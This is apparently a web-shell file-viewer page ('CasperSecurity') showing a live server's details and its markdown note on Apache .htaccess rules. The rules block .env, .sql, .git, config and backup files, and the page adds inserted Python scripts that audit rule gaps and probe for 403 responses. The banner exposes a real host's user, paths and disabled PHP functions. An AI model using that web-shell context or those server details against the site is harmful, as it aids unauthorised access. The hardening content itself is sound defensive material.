CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/private_html/


Current File : /home/gositeme/domains/soundstudiopro.com/private_html/SECURITY_PROTECTED_FILES.md
# 🔒 Security: Protected Files & Directories

**Date:** 2025-01-27  
**Status:** All sensitive files and directories are now protected

---

## ✅ **Files Now Protected**

### **Documentation Files**
- ✅ All `.md` files (155 files) - Contain system architecture, database schemas, API endpoints, security details

### **Configuration Files**
- ✅ `.env` files - Environment variables and credentials
- ✅ `.sql` files - Database dumps and migration scripts
- ✅ `.log` files - Application logs with sensitive data
- ✅ `database.env.php` - Database credentials
- ✅ `composer.json` / `package.json` - Dependency information

### **Test & Debug Files**
- ✅ `test*.php` files (47 files) - Test files exposing system internals
- ✅ `debug*.php` files (12 files) - Debug files with sensitive information
- ✅ `spec*.php` files - Test specifications

### **Backup Files**
- ✅ `.bak` files - Backup files
- ✅ `.backup` files - Backup files
- ✅ `.old` files - Old versions
- ✅ `.orig` / `.original` files - Original copies
- ✅ `.tmp` files - Temporary files

### **Version Control**
- ✅ `.git` directory - Git repository (exposes code history)
- ✅ `.svn` / `.hg` files - Other version control systems

### **IDE Files**
- ✅ `.idea` directory - PhpStorm/IntelliJ configuration
- ✅ `.vscode` directory - VS Code configuration
- ✅ `.sublime` files - Sublime Text configuration
- ✅ `.phpstorm` files - PhpStorm configuration

### **Fix/Migration Scripts**
- ✅ `fix_*.php` files - Fix scripts that might expose internals
- ✅ `auto_fix*.php` files - Automated fix scripts
- ✅ `migrate_*.php` files - Migration scripts
- ✅ `create_*_tables.php` files - Table creation scripts
- ✅ `run_*.php` files - Utility scripts

---

## ✅ **Directories Now Protected**

### **Sensitive Directories**
- ✅ `/config/` - Configuration files (database, email, API keys)
- ✅ `/migrations/` - Database migration scripts
- ✅ `/task_results/` - API callback data and results
- ✅ `/logs/` - Application logs with sensitive information
- ✅ `/.git/` - Version control repository

---

## 🛡️ **Protection Methods**

### **1. RewriteRule (Apache mod_rewrite)**
Blocks requests at the URL rewriting level (in an `.htaccess` file this needs `RewriteEngine On` above the rules, and mod_rewrite must be enabled):
```apache
RewriteEngine On
# Any request whose path ends in .md is refused with 403 (F) and rewriting stops (L)
RewriteRule \.md$ - [F,L]
# Everything under config/ (relative to this .htaccess) is refused
RewriteRule ^config/ - [F,L]
```

### **2. FilesMatch (Apache)**
Blocks specific file patterns, in every directory below the `.htaccess`, regardless of the request path:
```apache
<FilesMatch "\.md$">
    # Apache 2.2 access-control syntax; on Apache 2.4 this only works with
    # mod_access_compat loaded. The 2.4-native equivalent is: Require all denied
    Order allow,deny
    Deny from all
</FilesMatch>
```

### **3. Directory Protection**
- `Options -Indexes` - Prevents directory listing
- Directory-specific `.htaccess` files where needed
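The rules above are regular expressions, so the only way to know what they cover is to run the same patterns over the paths you care about. The following script is an added example, not part of this document or of the site's own `.htaccess`; it re-creates the file and directory patterns listed earlier in this document as Python regexes (the exact regexes in the real `.htaccess` are an assumption) and reports which candidate paths would still be served. It goes a little beyond the page by including a few deliberately chosen near-misses (`.env.production`, an upper-case `.MD`, an editor `~` backup, a `run_*.php` file inside `/api/`) so that the gaps and over-matches of suffix-anchored patterns are visible.

```python
import re
from typing import Dict, Iterable, List

# File-name patterns, applied to the last path component as FilesMatch does.
# Assumed to mirror the rules summarised in this document; not copied from the site.
FILE_PATTERNS = [
    r"\.md$", r"\.env$", r"\.sql$", r"\.log$",
    r"\.bak$", r"\.backup$", r"\.old$", r"\.orig$", r"\.original$", r"\.tmp$",
    r"^test.*\.php$", r"^debug.*\.php$", r"^spec.*\.php$",
    r"^fix_.*\.php$", r"^auto_fix.*\.php$", r"^migrate_.*\.php$",
    r"^create_.*_tables\.php$", r"^run_.*\.php$",
    r"^database\.env\.php$", r"^composer\.json$", r"^package\.json$",
]

# Directory prefixes, applied to the request path as the RewriteRule ^config/ style does.
DIR_PATTERNS = [
    r"^config/", r"^migrations/", r"^task_results/", r"^logs/",
    r"^\.git/", r"^\.svn/", r"^\.hg/", r"^\.idea/", r"^\.vscode/",
]


def is_blocked(path: str) -> bool:
    """True if either rule layer would answer this request path with 403."""
    rel = path.lstrip("/")
    if any(re.search(p, rel) for p in DIR_PATTERNS):
        return True
    # FilesMatch looks only at the file name, wherever the file lives.
    name = rel.rsplit("/", 1)[-1]
    return any(re.search(p, name) for p in FILE_PATTERNS)


def audit(paths: Iterable[str]) -> Dict[str, bool]:
    """Map each candidate path to whether the rules block it."""
    return {p: is_blocked(p) for p in paths}


def find_gaps(paths: Iterable[str]) -> List[str]:
    """Sensitive-looking paths the patterns do NOT block (sorted for stable output)."""
    return sorted(p for p, blocked in audit(paths).items() if not blocked)


# Constructed sample paths for this example; none are taken from the site.
SAMPLE_PATHS = [
    "/SITE_ANALYSIS.md",        # blocked by \.md$
    "/config/database.php",     # blocked by ^config/
    "/test_api.php",            # blocked by ^test.*\.php$
    "/index.php",               # served, by design
    "/.env.production",         # NOT blocked: \.env$ only matches a bare .env
    "/README.MD",               # NOT blocked: the regex is case-sensitive
    "/includes/db.php~",        # NOT blocked: editor backup suffix is not in the list
    "/api/run_task.php",        # blocked even though /api/ is meant to stay public
]

if __name__ == "__main__":
    for p, blocked in audit(SAMPLE_PATHS).items():
        print(f"{'403' if blocked else '200'}  {p}")
    print("gaps:", find_gaps(SAMPLE_PATHS))
```

Two things the output makes concrete: suffix-anchored patterns such as `\.env$` miss variants like `.env.production`, and a global `FilesMatch` for `run_*.php` also catches files of that name inside the directories this document lists as intentionally public. Add `[NC]` (RewriteRule) or `(?i)` (FilesMatch) if case-insensitive matching is wanted, and extend the patterns rather than assuming the list is complete.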

---

## 📋 **What This Prevents**

### **Security Risks Mitigated:**
1. ✅ **Information Disclosure** - System architecture, database structure
2. ✅ **Credential Exposure** - Database passwords, API keys
3. ✅ **Code Exposure** - Source code via .git directory
4. ✅ **Debug Information** - Debug files exposing internals
5. ✅ **Log Data** - Sensitive user data in logs
6. ✅ **Configuration Exposure** - Database configs, API settings

---

## ⚠️ **Important Notes**

### **Vendor Directory**
- The `/vendor/` directory is **NOT** blocked by default
- This is needed for Composer autoloading
- If you want to block it, uncomment the rule in `.htaccess`

### **Public Access**
- All protected files return **403 Forbidden** when accessed
- Files remain on server for internal use
- No files are deleted, only access is restricted

### **Testing**
To verify protection is working:
1. Try accessing: `https://soundstudiopro.com/SITE_ANALYSIS.md` → Should return 403
2. Try accessing: `https://soundstudiopro.com/config/database.php` → Should return 403
3. Try accessing: `https://soundstudiopro.com/test_api.php` → Should return 403
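The three manual checks above are easy to automate so they can be re-run after every `.htaccess` change. The script below is an added example, not part of this document or the site; `fetch_status` does a real GET with `urllib` (a 403 surfaces as `HTTPError`, which is caught and returned as the code), while `verify_protection` accepts any fetch callable so the logic can be exercised offline with the constructed `fake_fetch` responses. The base URL, path list and the fake status table are all assumptions for the example.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

Result = Tuple[int, bool]  # (observed status, matched expectation)


def fetch_status(url: str, timeout: float = 10.0) -> int:
    """GET url and return the HTTP status; urllib raises on 4xx/5xx, so unwrap the code."""
    req = urllib.request.Request(url, method="GET",
                                 headers={"User-Agent": "protection-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def verify_protection(base_url: str, paths: List[str],
                      fetch: Callable[[str], int] = fetch_status,
                      expected: int = 403) -> Dict[str, Result]:
    """Probe each path and record whether it returned the expected 403."""
    results: Dict[str, Result] = {}
    for p in paths:
        url = base_url.rstrip("/") + "/" + p.lstrip("/")
        status = fetch(url)
        results[p] = (status, status == expected)
    return results


def failures(results: Dict[str, Result]) -> List[str]:
    """Paths that did not return the expected status, sorted for stable output."""
    return sorted(p for p, (_, ok) in results.items() if not ok)


# Constructed responses so the example runs offline; they are not real observations.
FAKE_STATUSES = {
    "SITE_ANALYSIS.md": 403,
    "config/database.php": 403,
    "test_api.php": 200,        # simulates a rule that was not applied
    "does_not_exist.md": 404,   # a 404 proves nothing about the rule
}


def fake_fetch(url: str) -> int:
    """Stand-in for fetch_status: look the path up in FAKE_STATUSES."""
    path = url.split("/", 3)[-1]
    return FAKE_STATUSES.get(path, 200)


if __name__ == "__main__":
    # Replace fake_fetch with fetch_status (the default) to probe a real host.
    res = verify_protection("https://example.invalid", list(FAKE_STATUSES), fetch=fake_fetch)
    for p, (status, ok) in res.items():
        print(f"{'OK ' if ok else 'BAD'} {status} {p}")
    print("failures:", failures(res))
```

Only a 403 counts as a pass: a 404 means the file was absent, not protected, and `urlopen` follows redirects, so an HTTP-to-HTTPS or login redirect shows up as the final page's status. Probe the exact case and spelling the rules use, and include at least one path that should stay public so a rule that is too broad is caught as well.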

---

## 🔍 **Files Still Accessible (By Design)**

These files/directories are **intentionally** accessible:
- ✅ `/api/` - API endpoints (needed for functionality)
- ✅ `/assets/` - Public assets (CSS, JS, images)
- ✅ `/auth/` - Authentication pages (login, register)
- ✅ `/includes/` - Included PHP files (processed by server)
- ✅ Main PHP pages (index.php, library.php, etc.)

---

## 📊 **Summary**

- **Total Files Protected:** 200+ files
- **Directories Protected:** 5+ directories
- **Protection Methods:** 2 layers (RewriteRule + FilesMatch)
- **Security Level:** High - All sensitive files blocked

**Status:** ✅ **SECURE** - All sensitive files and directories are now protected from public access.
